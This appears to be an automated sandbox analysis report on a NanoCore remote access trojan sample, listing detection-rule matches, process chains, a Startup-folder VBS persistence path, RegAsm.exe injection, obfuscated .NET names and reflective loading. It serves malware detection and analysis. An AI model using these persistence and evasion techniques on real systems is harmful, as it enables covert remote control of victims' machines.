      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Code function: 0_2_00261000
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Code function: 0_2_0026B735
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Code function: 0_2_00D04515
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0528E471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0528E480
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0528BBD4
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Code function: 7_2_00AB1000
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Code function: 7_2_00ABB735
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Code function: 7_2_010D4515
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Binary or memory string: OriginalFilename vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.261116621.0000000002BB6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.256211245.0000000002D3F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000002.269032372.0000000000C90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunobservant.exe6 vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000000.242599852.0000000000275000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameunobservant.exe6 vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Binary or memory string: OriginalFilenameunobservant.exe6 vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ople.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Virustotal: Detection: 72%
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Metadefender: Detection: 41%
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe ReversingLabs: Detection: 73%
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe File read: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown Process created: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs"
      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe File created: C:\Users\user\AppData\Roaming\etwa
      Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@10/4@12/2
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{3b5167aa-3858-4f80-81dc-688e9982fe68}
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01
      Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs"
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: wntdll.pdbUGP source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe Code function: 0_2_002627F6 push ecx; ret 0_2_00262809
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe Code function: 7_2_00AB27F6 push ecx; ret 7_2_00AB2809
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
